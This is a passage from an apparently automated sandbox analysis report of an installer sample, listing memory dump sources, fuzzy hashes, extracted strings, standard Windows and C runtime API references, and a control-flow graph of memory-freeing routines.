                                                                        • Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @K$OZ$fU
                                                                        • API String ID: 0-3622593885
                                                                        • Opcode ID: b1e4f2db202d41de8c363dd3b7156072ed7193fff42a65196c40993f8a07de13
                                                                        • Instruction ID: 6c86b8d5a058767ee05c710e6880302c74f3c3ae144df3135fb1eb60299af2ed
                                                                        • Opcode Fuzzy Hash: b1e4f2db202d41de8c363dd3b7156072ed7193fff42a65196c40993f8a07de13
                                                                        • Instruction Fuzzy Hash: F04114B5C003688BDB24DFA9DC4069EBF72EB51310F24829CD45A7B788D7754946CF91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ttK]$ttK]
                                                                        • API String ID: 0-284419763
                                                                        • Opcode ID: 1e333ac49ef0f9fee7be05a429d8e3eb3e4457990aae3ef2b8936a8577ec78d4
                                                                        • Instruction ID: d9aadd2033328041550625322df7bcee7bfb8690942ebff4fd71107eb01d97ac
                                                                        • Opcode Fuzzy Hash: 1e333ac49ef0f9fee7be05a429d8e3eb3e4457990aae3ef2b8936a8577ec78d4
                                                                        • Instruction Fuzzy Hash: 1572F236F551158FDF08CEFCC4953DEB7F2AB47322F209615D825DBA94C62E890A8B84
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8$DvEU
                                                                        • API String ID: 0-3215943700
                                                                        • Opcode ID: ccfe9cd8ab51002ecc399d4c47a890e227e1910a670b0d106a69bd4901daa0e1
                                                                        • Instruction ID: c09f455e2d05b6a912060325af54aa88d8718df96c7322c1135f4d5604ae47e6
                                                                        • Opcode Fuzzy Hash: ccfe9cd8ab51002ecc399d4c47a890e227e1910a670b0d106a69bd4901daa0e1
                                                                        • Instruction Fuzzy Hash: 43D1E4726093809BE315CF25C85079BBFE2FBC5314F188A6DE5D58B291DB39C50ACB92
                                                                        APIs
                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CF3894C,?,?,00000008,?,?,6CF385E4,00000000), ref: 6CF38B7E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionRaise
                                                                        • String ID:
                                                                        • API String ID: 3997070919-0
                                                                        • Opcode ID: ce080c5cc0875d42ef2ce3e0a57da3d44ae37ab43b272d19a73c353f6bcd6208
                                                                        • Instruction ID: 5ee63001a8b620d60d765a05e2d6ac56c04e0a36792b50ddf71a298612d1af49
                                                                        • Opcode Fuzzy Hash: ce080c5cc0875d42ef2ce3e0a57da3d44ae37ab43b272d19a73c353f6bcd6208
                                                                        • Instruction Fuzzy Hash: 56B16F31211615EFDB05CF18C486B557BE0FF45368F25965AE8ADCF6A1C339E982CB80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: eV6
                                                                        • API String ID: 0-2154276878
                                                                        • Opcode ID: e1446471a53c5d40c5a1050866a2428d35bf0329ebb40bfb6e10cd24bc13c286
                                                                        • Instruction ID: 978d171bfa89c434dca7f4305abc665ff1a0abe9e565189a3abc3bc6954448fe
                                                                        • Opcode Fuzzy Hash: e1446471a53c5d40c5a1050866a2428d35bf0329ebb40bfb6e10cd24bc13c286
                                                                        • Instruction Fuzzy Hash: CDF11476E516049FCF08CEBCD8A47DE7BF2EB46325F209619F825DB794C72A58098B40
                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CF2FB1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: FeaturePresentProcessor
                                                                        • String ID:
                                                                        • API String ID: 2325560087-0
                                                                        • Opcode ID: d0141e8fcb0bddd220e9f64acca559e8ad9db512ac4098138bfe691bb8b959e1
                                                                        • Instruction ID: 7746626bcc1f0fd30d7cc4f3dfd1d75c7f4b7b7d75b3d322e86af2c4f3b7ce1d
                                                                        • Opcode Fuzzy Hash: d0141e8fcb0bddd220e9f64acca559e8ad9db512ac4098138bfe691bb8b959e1
                                                                        • Instruction Fuzzy Hash: 11516EB1E2261A8FDF84CF95C4817AEB7F4FB4A314F20856AD815EB644D3799A40CF90
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0397c3387af317e7653a6b3de8c17bf036150be8aab0cc39e637b7b7f8a3abba
                                                                        • Instruction ID: 5b12ea114f8ba68876365b326a9ef6c5ad620d3d8c74cc780e1ca1a354d910ac
                                                                        • Opcode Fuzzy Hash: 0397c3387af317e7653a6b3de8c17bf036150be8aab0cc39e637b7b7f8a3abba
                                                                        • Instruction Fuzzy Hash: 6B41B4B1C05229AFDF10CF69CC88AEABBB9AF45304F1452D9E41DD3201DA359E848FA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: >?>1
                                                                        • API String ID: 0-245164388
                                                                        • Opcode ID: a41848187ed78856e0cc4ef49d9971f9b846532ebba82b47db06257435c12298
                                                                        • Instruction ID: 84f3fb1cd8d8b6ed17a8f82f7e31a78704fb3572dd78b5aed82e2256600b7ee2
                                                                        • Opcode Fuzzy Hash: a41848187ed78856e0cc4ef49d9971f9b846532ebba82b47db06257435c12298
                                                                        • Instruction Fuzzy Hash: 508114B67083018BD72C9F29D891A6FBBE2EBC5314F198A7CE5D287391D731A845C781
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,
                                                                        • API String ID: 0-3772416878
                                                                        • Opcode ID: 0af4c2785b0ede1ac2b18171dd5ffacc3cd7985cf361380d3aef21a4375ba1f7
                                                                        • Instruction ID: 2fb1c09645b797b6485071ba2800afe024a68c4c3b2faa9de4f446b65412a8b3
                                                                        • Opcode Fuzzy Hash: 0af4c2785b0ede1ac2b18171dd5ffacc3cd7985cf361380d3aef21a4375ba1f7
                                                                        • Instruction Fuzzy Hash: 6BB148711097819FD321CF18C88061BFFE1AFA9604F448A6DE5D997382D631EA18CBA7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: 2353990acf00f0473b99eaadd4b992f624be7b09477891bcd076503ae0d70e50
                                                                        • Instruction ID: f6dc7d01a53c0e6786061524ef80c264dc0b47fd1a0a93fcd897975433b8d9b6
                                                                        • Opcode Fuzzy Hash: 2353990acf00f0473b99eaadd4b992f624be7b09477891bcd076503ae0d70e50
                                                                        • Instruction Fuzzy Hash: 464101F1A143018BD7198F28C89167BB7E1FF95328F04863CE5D95B295E775A9048781
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: 5d580b6aa84ec14a5a26ad5fae176bf7c8bb27b9b16dba312ceb6d05e17e376f
                                                                        • Instruction ID: fedd9ca6e91e964815924d05a8a7a7db78393ff571b8be054ed03477693a082c
                                                                        • Opcode Fuzzy Hash: 5d580b6aa84ec14a5a26ad5fae176bf7c8bb27b9b16dba312ceb6d05e17e376f
                                                                        • Instruction Fuzzy Hash: 8431DF711183049BD310DF18D8C16ABBBF4EBC6324F14992CEAD887290D331A4488BA6
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID: HeapProcess
                                                                        • String ID:
                                                                        • API String ID: 54951025-0
                                                                        • Opcode ID: 4e8a349a9aaf4966f329c9b5f329edda3092a268d96e621f2cbcee623262a666
                                                                        • Instruction ID: bc7905876b3b209a4b3471d40d1f59382862d5d721bcb3195be2a4f9c12df7a6
                                                                        • Opcode Fuzzy Hash: 4e8a349a9aaf4966f329c9b5f329edda3092a268d96e621f2cbcee623262a666
                                                                        • Instruction Fuzzy Hash: 9CA01130B222008BAF808E3282883083BFAAA0328030A0028A008C0000EA2088A0AAC0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7f39d522379ad40aae35da3725a3813add9555377534b12a985beb8e37557a53
                                                                        • Instruction ID: ae05cb7be0ae304f9cb277c38eefb98230c2377812e4557fc89169a6b1f319a5
                                                                        • Opcode Fuzzy Hash: 7f39d522379ad40aae35da3725a3813add9555377534b12a985beb8e37557a53
                                                                        • Instruction Fuzzy Hash: CB624871508FC18ED3728B3C8849796BFD56B6A324F084A9DD0FA8B3D2D3B4A505C766
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f926f161f65c4bb02c8ebdc0555aac8b9d9481d3e87fd870cc4a3c8b7d376920
                                                                        • Instruction ID: c2b067ce4dcc7a77c8d2c160ff8363bf2f44672c12bcd01b4504e0813cbf6da6
                                                                        • Opcode Fuzzy Hash: f926f161f65c4bb02c8ebdc0555aac8b9d9481d3e87fd870cc4a3c8b7d376920
                                                                        • Instruction Fuzzy Hash: 69A12837F1999187C7198A7C8C513ADAA9B5FDE230B2E8379D8F69B3D1D63988024350
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 81c2e1500d7c54553f5b72f22875fc6859ab6a43d2963d94d6a64c82c973ad84
                                                                        • Instruction ID: e58bf5172c4bfa8f83f2dffd7a65c8e5a3f4f38eab33fda32b63ebcddd803bb0
                                                                        • Opcode Fuzzy Hash: 81c2e1500d7c54553f5b72f22875fc6859ab6a43d2963d94d6a64c82c973ad84
                                                                        • Instruction Fuzzy Hash: F08191746083029FE715DF1DC890A6AB7E2FF99350F19896CEAC48B365D731E891CB42
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b248b3193c8cc356776cf4c4b6dddaa70b915cc7ac97db3671264d6b30661511
                                                                        • Instruction ID: c04eb2162c2127afc1b1ed203d6bd217290ba987da0743487a327c27cf564047
                                                                        • Opcode Fuzzy Hash: b248b3193c8cc356776cf4c4b6dddaa70b915cc7ac97db3671264d6b30661511
                                                                        • Instruction Fuzzy Hash: 47812B72A042624FC716CE2CC85035ABBD1AB85264F19C67DE8F9DB3D6D679CC4983C1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1f7141a4655e551e75dd933aa4856814fa4c73579676074ff72206410a357981
                                                                        • Instruction ID: b673172d22f478acad8083665d58a9fa0982db1f5bb4a4d41699fc5f303a84b6
                                                                        • Opcode Fuzzy Hash: 1f7141a4655e551e75dd933aa4856814fa4c73579676074ff72206410a357981
                                                                        • Instruction Fuzzy Hash: 4371E837B56AA14793248D7C4C412A9AA571BE7134B3EC3BAEDF45B3E5C5BA8C064380
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a6442eb1fd7af9a22d9a9283743da660da99369db3c6425bde2065012f387402
                                                                        • Instruction ID: c67081714722a1d9f24613e99a2b98529111206035523817917da1a3a0544adb
                                                                        • Opcode Fuzzy Hash: a6442eb1fd7af9a22d9a9283743da660da99369db3c6425bde2065012f387402
                                                                        • Instruction Fuzzy Hash: 1B71A976A152468FDB04CEFCC9917EEBBF2EB4A314F208115E415E7A80C63ADD05CB69
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ef81046b9e8353ef4a7d09ec96efab5827aaa14c00266810f0cccc7e7b2ce03d
                                                                        • Instruction ID: 55713f89347604b0bd20c917e27c4285472bdc93ef6be67747fa8236db98646d
                                                                        • Opcode Fuzzy Hash: ef81046b9e8353ef4a7d09ec96efab5827aaa14c00266810f0cccc7e7b2ce03d
                                                                        • Instruction Fuzzy Hash: 70612E37E599D14BC7154E7C5CA12BDAA5B6BD3130B2E83BAECF15F3D1C629480683A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: aa089a12e49fe4722f46bbcd436e3cf85ce1ee6a1726378f89a8ebfb9a03aae6
                                                                        • Instruction ID: 8801dc5dd0d3f2ca99ca2045f78e2ddfc0be2bb17b6f910651167da648f5f733
                                                                        • Opcode Fuzzy Hash: aa089a12e49fe4722f46bbcd436e3cf85ce1ee6a1726378f89a8ebfb9a03aae6
                                                                        • Instruction Fuzzy Hash: 38516CB16087548FE314DF29D89435BBBE5BBC4318F048E2EE5E987351E379D6088B82
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e90bab415c10ff1a789613c66bb3a92337d11cceb8dd92cc69c2d2a1782b6dcf
                                                                        • Instruction ID: 62974823f5dc1de9ea191a038513b04f53dfaeba129f51a8a29651d6cf9a9c8f
                                                                        • Opcode Fuzzy Hash: e90bab415c10ff1a789613c66bb3a92337d11cceb8dd92cc69c2d2a1782b6dcf
                                                                        • Instruction Fuzzy Hash: B551D571604B108BD735CE2DD8D066BFBF1AF863147188B6DD8E68B792D730E9098790
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 347d65627b2d4b62f440fb59d031725257537ebfb9ecdb4bfd198b290f6305fe
                                                                        • Instruction ID: e74c77384c39383ca9410745af759eda1ebb0b7aa2a178b4c608e65aa0e61537
                                                                        • Opcode Fuzzy Hash: 347d65627b2d4b62f440fb59d031725257537ebfb9ecdb4bfd198b290f6305fe
                                                                        • Instruction Fuzzy Hash: 0431E7B5A143096BE710DB19DC80B6B7BDDEFD135CF048478E9C697252E272E805C692
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true
                                                                        • Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                                        • Instruction ID: c7c5fd175460f5423bde68df54e3f1f4d23259375714df2623b57ad8f5daeb99
                                                                        • Opcode Fuzzy Hash: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                                        • Instruction Fuzzy Hash: 6AE08C32916238FBCB10CB8CC944D8AB3FCEB88A44B110496B515D3601C270DE00C7E0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1762 6cf34c89-6cf34c9d 1763 6cf34d0b-6cf34d13 1762->1763 1764 6cf34c9f-6cf34ca4 1762->1764 1766 6cf34d15-6cf34d18 1763->1766 1767 6cf34d5a-6cf34d72 call 6cf34dfa 1763->1767 1764->1763 1765 6cf34ca6-6cf34cab 1764->1765 1765->1763 1768 6cf34cad-6cf34cb0 1765->1768 1766->1767 1770 6cf34d1a-6cf34d57 call 6cf325a4 * 4 1766->1770 1776 6cf34d75-6cf34d7c 1767->1776 1768->1763 1771 6cf34cb2-6cf34cba 1768->1771 1770->1767 1774 6cf34cd4-6cf34cdc 1771->1774 1775 6cf34cbc-6cf34cbf 1771->1775 1781 6cf34cf6-6cf34d0a call 6cf325a4 * 2 1774->1781 1782 6cf34cde-6cf34ce1 1774->1782 1775->1774 1778 6cf34cc1-6cf34cd3 call 6cf325a4 call 6cf36bb7 1775->1778 1779 6cf34d9b-6cf34d9f 1776->1779 1780 6cf34d7e-6cf34d82 1776->1780 1778->1774 1790 6cf34da1-6cf34da6 1779->1790 1791 6cf34db7-6cf34dc3 1779->1791 1786 6cf34d84-6cf34d87 1780->1786 1787 6cf34d98 1780->1787 1781->1763 1782->1781 1788 6cf34ce3-6cf34cf5 call 6cf325a4 call 6cf36cb5 1782->1788 1786->1787 1795 6cf34d89-6cf34d97 call 6cf325a4 * 2 1786->1795 1787->1779 1788->1781 1798 6cf34db4 1790->1798 1799 6cf34da8-6cf34dab 1790->1799 1791->1776 1793 6cf34dc5-6cf34dd0 call 6cf325a4 1791->1793 1795->1787 1798->1791 1799->1798 1806 6cf34dad-6cf34db3 call 6cf325a4 1799->1806 1806->1798
                                                                        APIs
                                                                        • ___free_lconv_mon.LIBCMT ref: 6CF34CCD
                                                                          • Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36BD4
                                                                          • Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36BE6
                                                                          • Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36BF8
                                                                          • Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36C0A
                                                                          • Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36C1C
                                                                          • Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36C2E
                                                                          • Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36C40
                                                                          • Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36C52
                                                                          • Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36C64
                                                                          • Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36C76
                                                                          • Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36C88
                                                                          • Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36C9A
                                                                          • Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36CAC
                                                                        • _free.LIBCMT ref: 6CF34CC2
                                                                          • Part of subcall function 6CF325A4: HeapFree.KERNEL32(00000000,00000000,?,6CF317DC), ref: 6CF325BA
                                                                          • Part of subcall function 6CF325A4: GetLastError.KERNEL32(?,?,6CF317DC), ref: 6CF325CC
                                                                        • _free.LIBCMT ref: 6CF34CE4
                                                                        • _free.LIBCMT ref: 6CF34CF9
                                                                        • _free.LIBCMT ref: 6CF34D04
                                                                        • _free.LIBCMT ref: 6CF34D26
                                                                        • _free.LIBCMT ref: 6CF34D39
                                                                        • _free.LIBCMT ref: 6CF34D47
                                                                        • _free.LIBCMT ref: 6CF34D52
                                                                        • _free.LIBCMT ref: 6CF34D8A
                                                                        • _free.LIBCMT ref: 6CF34D91
